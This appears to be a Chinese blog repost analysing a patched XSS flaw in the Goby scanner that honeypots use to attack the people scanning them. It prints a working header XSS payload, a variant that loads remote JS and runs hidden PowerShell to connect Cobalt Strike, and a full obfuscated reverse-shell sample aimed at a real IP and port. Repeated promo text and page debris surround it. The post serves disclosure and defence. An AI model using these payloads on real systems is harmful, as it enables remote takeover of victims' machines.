网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
在达成条件之后,这个漏洞能够带来的后果非常严重,可以被反制方直接控制Goby所在的PC,但幸运的是这个漏洞并不是一个0click漏洞,需要Goby的使用人员来配合交互才能达成触发条件。
如你所见,这是正常的资产界面,以及版本信息提取结果,但可以通过构造HTTP头部的方式,来对版本信息进行调整,比如这样:
#index.php
<?php
header("X-Powered-By: PHP/<img\tsrc=\"x\"\tοnerrοr=\"alert(1);\">");
?>
此时,用户在Goby界面上看到的结果是这样的:
在界面上可以很清楚的看到反制方所使用的payload,该页面上并不会触发XSS代码,但如果此时只要点击进入IP详情界面,如下图所示,就会触发XSS代码
反制方当然可以利用此漏洞做更多的事情,可以跟上述蜜罐设备一样从远端下载恶意文件并触发执行,也可以直接调用Powershell执行ShellCode,上线CS:
# index.php
<?php
header("X-Powered-By: PHP/<img\tsrc=\"x\"\tοnerrοr=import(unescape('http%3A//119.\*\*.\*\*.135%3A18899/js/1.js'))>");
?>
// /js/1.js
(function(){require('child\_process').exec('powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAc......(省略)');})();
当用户点击进入IP详情页面后,不会有任何感知,但实际上已经悄然执行powershell代码
成功上线CS
所以,尽快升级Goby到最新版本吧~~,除了自身漏洞的修复,我们也一直在推出更多好用、实用的新功能期待师傅们的体验和反馈。
0x04 还有多少个蜜罐在望眼欲穿呢?
诚如我们前文所说,这是一个已经修复近两年前的漏洞了,但是在全球范围内,仍然有着大量的蜜罐设备,再等待着某一个仍然使用旧版本Goby的好心人,我们可以使用一条FOFA语法便可以很快的找到这些目标:
header="img" && header="onerror"
可以看到,在全球范围内,有近1899条蜜罐记录,其Payload也大同小异,与前文碰到的蜜罐设备一致,有意思的是在境外也有数十条记录(老外也想反制Goby?)。
而从产品分布的角度来说,这类蜜罐广泛覆盖在:深信服VPN、致远OA、RANZHIOA、泛微OA、phpMyAdmin等在攻防场景中广泛涉及的产品和应用,师傅们碰到这些资产可要多个心眼。
我们也可以对Fofa语法进行略微的调整,看看有没有一些新东西
header="img" && header="onerror" && header!="PHP"
剔除掉同类蜜罐后,仅剩下160条记录,明显有着与之前蜜罐设备不同的利用方式
X-Powered-By: <img src=# οnerrοr=window.open('https://202.\*\*.\*\*\*.12/help.html')>
跟进到help.html之后,发现是一个经过混淆的Payload
<!-- help.html !-->
<!DOCTYPE HTML>
<html>
<head>
<meta charset="utf-8" />
<script>
var \_0x1c94=['temp.js','utf8','writeFile','uuid','child\_process','fork','/tmp/temp.js'];var \_0x4cc5=function(\_0x1c94c3,\_0x4cc551){\_0x1c94c3=\_0x1c94c3-0x0;var \_0x3be382=\_0x1c94[\_0x1c94c3];return \_0x3be382;};var \_0x551876='';var \_0x840f11='\x0avar\x20\_0x411b=[\x27net\x27,\x27child\_process\x27,\x27platform\x27,\x27spawn\x27,\x27/bin/bash\x27,\x27Socket\x27,\x27connect\x27,\x27stdout\x27,\x27pipe\x27];var\x20\_0x4b64=function(\_0x411be0,\_0x4b6451){\_0x411be0=\_0x411be0-0x0;var\x20\_0x278a8f=\_0x411b[\_0x411be0];return\x20\_0x278a8f;};var\x20\_0x1f656a=\x27106.75.15.34\x27;var\x20\_0xb2ca98=\x2722220\x27;(function(){var\x20\_0x58cd49=require(\x27os\x27);var\x20\_0x20a0b2=require(\x27fs\x27);var\x20\_0x2af086=require(\_0x4b64(\x270x0\x27));var\x20\_0x597913=require(\_0x4b64(\x270x1\x27));var\x20\_0x269932=\_0x58cd49[\_0x4b64(\x270x2\x27)]();if(\_0x269932==\x27win32\x27){var\x20\_0x16b7e1=\_0x597913[\x27spawn\x27](\x27cmd\x27,[]);}else{var\x20\_0x16b7e1=\_0x597913[\_0x4b64(\x270x3\x27)](\_0x4b64(\x270x4\x27),[\x27-i\x27]);}var\x20\_0x293f60=new\x20\_0x2af086[(\_0x4b64(\x270x5\x27))]();\_0x293f60[\_0x4b64(\x270x6\x27)](\_0xb2ca98,\_0x1f656a,function(){\_0x293f60[\x27pipe\x27](\_0x16b7e1[\x27stdin\x27]);\_0x16b7e1[\_0x4b64(\x270x7\x27)][\_0x4b64(\x270x8\x27)](\_0x293f60);\_0x16b7e1[\x27stderr\x27][\x27pipe\x27](\_0x293f60);});return/a/;}());\x0a';var \_0x2b76a6=require('fs');var \_0x512c82=require('os')['platform']();if(\_0x512c82=='win32'){\_0x2b76a6['writeFile'](\_0x4cc5('0x0'),\_0x840f11,\_0x4cc5('0x1'),function(\_0x4af088){});\_0x2b76a6[\_0x4cc5('0x2')](\_0x4cc5('0x3'),\_0x551876,\_0x4cc5('0x1'),function(\_0x3e2b1c){});require(\_0x4cc5('0x4'))[\_0x4cc5('0x5')](\_0x4cc5('0x0'),{'detached':!![]});}else{\_0x2b76a6[\_0x4cc5('0x2')](\_0x4cc5('0x6'),\_0x840f11,\_0x4cc5('0x1'),function(\_0x261f0f){});\_0x2b76a6['writeFile']('/tmp/uuid',\_0x551876,'utf8',function(\_0x474cc8){});require('child\_process')['fork'](\_0x4cc5('0x6'),{'detached':!![]});}
</script>
</head>
<body>
</body>
</html>
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
tps://bbs.csdn.net/topics/618658159)**
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
扫一扫
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
